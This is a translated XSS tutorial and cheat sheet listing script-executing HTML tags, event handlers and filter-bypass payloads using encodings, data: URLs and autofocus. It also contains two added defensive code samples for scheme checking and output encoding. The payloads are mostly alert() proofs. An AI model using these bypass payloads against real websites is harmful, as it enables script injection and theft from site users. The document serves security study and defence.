XSS Introduction

1. Tags that can execute JS (tested in Firefox). JS can be loaded externally, e.g. <script src=http://xxx.js></script>, or run inline, which can be further divided into a direct call inside <script>code</script>, an event attribute, and a pseudo-protocol, as follows:

<script> eg <script>alert(1)</script>

<a> eg <a href=javascript:alert(1)>11</a>

<p> eg <p onclick='javascript:alert(1)'>11</p>

<img> eg <img src=1 onerror=alert(1)>

<body> eg <body onload=alert(1)></body>

<button> eg <button onclick=alert(1)>sure</button>

<var> eg <var onclick=alert(1)>sure</var> (rendered in italics)

<div> eg <div onclick=alert(1)>sure</div>

<iframe> eg <iframe onload=alert(1)>sure</iframe>

<object> eg <object onclick=alert(1)>sure</object>

<input> eg <input onclick=alert(1)>

<select> eg <select onclick=alert(1)></select>

<textarea> eg <textarea onclick=alert(1)>11</textarea>

<keygen> eg <keygen onclick=alert(1)>

<frameset> eg <frameset onload=alert(1)>11</frameset>

<embed>

<svg> eg <svg/onload=alert(1)>

<math>

<video>

<audio>

2. Event handler attributes

onload onunload (leaving the page, or pressing F5) onchange onsubmit onreset onselect onblur onfocus onabort onkeydown onkeypress onkeyup onclick ondblclick onmouseover onmousemove onmouseout onmouseup onforminput onformchange ondrag ondrop

3. Attributes that can execute JS

formaction action href xlink:href autofocus src content data

<input type="submit" formaction="demo-admin.php" value="提交">

<form action="javascript:alert(1)">code</form>

<a href='javascript:alert(1)'>11</a>

4. Custom tags

<M/onclick="alert(1)">11</M>

5. Using / instead of a space between the tag name and its attributes

<img/src=x onerror=alert(1)>

6. The a tag

6.1 Using the javascript: pseudo-protocol: <a href=javascript:alert(2)>M

6.2 data: URL: <a href=data:text/html;base64,PHNjcmlwdD5hbGVydCgzKTwvc2NyaXB0Pg==>M

Two things to note:

First, an online base64 encoder/decoder: https://tool.oschina.net/encrypt?type=3

Second, the data: URL format is data:mime type;base64,content

6.3 URL encoding (does not work in Firefox or Chrome):

<a href=data:text/html;%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%2829%29%3C%2F%73%63%72%69%70%74%3E>M

Online URL encoder: http://www.jsons.cn/urlencode/

6.4 Radix encodings

The encodings used are JS octal, JS hexadecimal, URL encoding, base64, HTML entities, and HTML decimal and HTML hexadecimal character references; see https://www.bihuoedu.com/vul/radix/radix16.php, which also contains many simple vulnerability tests.

<a href=javascript:alert(13)>M pops an alert.

&#x61 and &#x61; are HTML hexadecimal character references for the letter a; &#97 is the decimal form of the same reference; &#x3A; is the HTML hexadecimal reference for the colon:

<a href=javascript:confirm(2)>M. &colon; also represents the colon. So if : is filtered, the encodings above give several ways around the filter, and if alert() is filtered, confirm() can be used instead.

<svg><a xlink:href="javascript:alert(14)"><rect width="1000" height="1000" fill="white"/></a></svg>

The xlink:href attribute; the link content is a white rectangle with a custom width and height.

<math><a xlink:href=javascript:alert(1)>M

The math tag.
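As an added defensive example (my code, not from the original page or its reference), the check below normalises a URL-type attribute value the way a browser does before reading the scheme: HTML character references such as &#x3A; and &colon; are decoded, surrounding whitespace is stripped, and only then is the scheme compared against javascript:, data: and vbscript:. It also shows why a substring match on "javascript:" is both too weak and too noisy. The function and table names are this example's own, and the named-reference table is a small assumed subset.

```javascript
// Added example: defender-side scheme check for href / xlink:href / src /
// formaction values. NAMED_REFS, decodeHtmlRefs, extractScheme and
// isDangerousUrlAttribute are this example's own names, not a library API.

// Small table of named references; a production check should use a full
// HTML entity decoder (assumption: these names cover the forms on this page).
const NAMED_REFS = { colon: ":", Tab: "\t", NewLine: "\n", lt: "<", gt: ">", amp: "&", quot: '"' };

// The HTML parser decodes character references in attribute values before the
// URL parser ever sees them, so "&#x3A;", "&#58" and "&colon;" all become ":".
function decodeHtmlRefs(s) {
  return s.replace(/&(#[xX][0-9a-fA-F]+|#[0-9]+|[a-zA-Z]+);?/g, (match, body) => {
    if (body[0] === "#") {
      const hex = body[1] === "x" || body[1] === "X";
      const cp = hex ? parseInt(body.slice(2), 16) : parseInt(body.slice(1), 10);
      return cp <= 0x10ffff ? String.fromCodePoint(cp) : match;
    }
    return Object.prototype.hasOwnProperty.call(NAMED_REFS, body) ? NAMED_REFS[body] : match;
  });
}

// Per the WHATWG URL parser: leading/trailing C0 controls and spaces are
// trimmed and ASCII tab/newline are removed before the scheme is read.
// Percent-encoding is not decoded at this stage, so a %-encoded scheme is
// not a scheme at all.
function extractScheme(url) {
  const cleaned = url.replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, "").replace(/[\t\n\r]/g, "");
  const m = /^([a-zA-Z][a-zA-Z0-9+\-.]*):/.exec(cleaned);
  return m ? m[1].toLowerCase() : null;
}

const DANGEROUS_SCHEMES = new Set(["javascript", "data", "vbscript"]);

// True when the attribute value would be interpreted as a script-bearing URL.
function isDangerousUrlAttribute(raw) {
  const scheme = extractScheme(decodeHtmlRefs(raw));
  return scheme !== null && DANGEROUS_SCHEMES.has(scheme);
}

// Naive substring filter, for comparison: misses encoded forms and flags
// harmless URLs that merely contain the text somewhere in the query.
function naiveContainsJavascript(raw) {
  return raw.toLowerCase().includes("javascript:");
}
```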

7. The script tag

7.1 Routine test with <script>alert(1)</script>

7.2 If alert() is filtered, alert(1) can be encoded; http://www.jsfuck.com/ will generate it.

7.3 <script firefox>alert(1)</script> also pops, but the tag name itself must be a well-formed script

7.4 Encoding, or

<script>~'\u0061' ;  \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073.  \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script>

7.5 Encoding

<script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script>

7.6 Not only alert() pops a dialog

<script>prompt(-[])</script>

<script>confirm(-[])</script>

7.7 Replacing double and single quotes

<script>alert(/3/)</script>

This pops in the same way as <script>alert('3')</script> and <script>alert(3)</script>

7.8 Converting a number to a string

<script>alert(String.fromCharCode(49))</script>

7.9 Adding .source

<script>alert(/7/.source)</script>

7.10 Using setTimeout

<script>setTimeout('alert(1)',0)</script>
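An added example (my code, not from the original page) contrasting two ways of handling the output: a filter that deletes the word alert, which the confirm, prompt and \u0061 variants above simply walk past, and HTML output encoding, which neutralises every one of them because the browser never sees a tag. Function names are this example's own; the regex detector is a crude stand-in for a parser, used for the demonstration only.

```javascript
// Added example: blocklist vs. output encoding for an HTML text context.
// renderBlocklist, escapeHtml, renderEncoded, stillExecutable and survivors
// are this example's own names.

// "Fix" 1: delete the word alert from the input (a blocklist).
function renderBlocklist(userInput) {
  const filtered = userInput.replace(/alert/gi, "");
  return `<p>Hello, ${filtered}</p>`;
}

// Fix 2: encode the five characters that are significant in HTML text and
// attribute contexts, so the input is shown literally and never parsed as a tag.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
function escapeHtml(s) {
  return s.replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}
function renderEncoded(userInput) {
  return `<p>Hello, ${escapeHtml(userInput)}</p>`;
}

// Crude check for the demonstration: does a <script ...> start tag or an
// on* event handler attribute survive in the rendered HTML? (Not a parser.)
function stillExecutable(html) {
  return /<script[\s\/>]/i.test(html) || /<[a-z][^>]*\son[a-z]+\s*=/i.test(html);
}

// Constructed test inputs, taken from the script-tag and img-tag variants on
// this page (the \\u0061 form is the JS-escaped spelling of "a").
const SAMPLES = [
  "<script>confirm(-[])</script>",
  "<script>\\u0061lert(1)</script>",
  "<script>alert(String.fromCharCode(49))</script>",
  "<img src=x onerror=confirm(1)>",
];

// Returns how many of the samples remain executable under a render strategy.
function survivors(renderFn) {
  return SAMPLES.filter((s) => stillExecutable(renderFn(s))).length;
}
```

With the blocklist all four samples still render as live markup; with encoding none do.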

button tag

1. Event

<button/onclick=alert(1) >M</button>

2. The rarely used formaction attribute

<form><button formaction=javascript&colon;alert(1)>M

3. autofocus

<button onfocus=alert(1) autofocus>

p tag

1. Output outside a tag: inject the JS statement directly

2. Output inside an attribute: consider closing the quote and the tag first

<p/onmouseover=javascript:alert(1); >M</p>

img tag

<img src=x onerror=alert(1)>

<img src ?itworksonchrome?\/onerror = alert(1)> for when src= is filtered; only works in Chrome

<img src=x onerror=window.open('http://www.baidu.com');> opens a window automatically; the browser's popup blocker will stop it, and it opens only if the user chooses to allow it

<img/src/onerror=alert(1)> usable in Chrome when spaces are filtered

<img src="x:kcf" onerror="alert(1)">

body tag

<body onload=alert(1)>

var tag

<var onmouseover="prompt(1)">KCF</var>

div tag

<div/onmouseover='alert(1)'>X

<div style="position:absolute;top:0;left:0;width:100%;height:100%" onclick="alert(52)">

iframe tag

<IFRAME SRC="javascript:alert(1);"></IFRAME> pseudo-protocol

<iframe/onload=alert(53)></iframe> attribute

meta tag

This gives another place to look for XSS: some sites display member profile data, such as the member name, in the page title, and that value is client-controlled. To sum up, the positions where XSS output can appear are: 1. the current page; 2. the page source and the DOM; 3. other pages or documents; 4. the site title.

object tag

<object data=data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4=></object>

marquee tag

<marquee  onstart="alert('sometext')"></marquee>

isindex tag

<isindex type=image src=1 onerror=alert(1)>

<isindex action=javascript:alert(1) type=image>

input tag

Nothing special: JS is called through an event. As in the button example earlier, autofocus makes the dialog pop without any user interaction. Here onblur is used as well; the same idea carries over to the other handlers.

<input onfocus=javascript:alert(1) autofocus>

<input onblur=javascript:alert(1) autofocus><input autofocus>

select tag

<select onfocus=javascript:alert(1) autofocus>

textarea tag

<textarea onfocus=javascript:alert(1) autofocus>

keygen tag

<keygen onfocus=javascript:alert(1) autofocus>

frameset tag

<FRAMESET><FRAME SRC="javascript:alert(1);"></FRAMESET>

<frameset onload=alert(1)>

embed tag

<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4="></embed> //chrome

<embed src=javascript:alert(1)> //firefox

svg tag

<svg onload="javascript:alert(1)" xmlns="http://www.w3.org/2000/svg"></svg>

<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(1)"></g></svg>  //works in Chrome

math tag

<math href="javascript:javascript:alert(1)">CLICKME</math>

<math><y/xlink:href=javascript:alert(51)>test1

<math><maction actiontype="statusline#http://wangnima.com" xlink:href="javascript:alert(49)">CLICKME</maction></math>

video tag

<video><source onerror="alert(1)">

<video src=x onerror=alert(48)>

audio tag

<audio src=x onerror=alert(47)>

Reference: https://www.leavesongs.com/PENETRATION/xss-collect.html

Origin www.cnblogs.com/qzdlp/p/12145799.html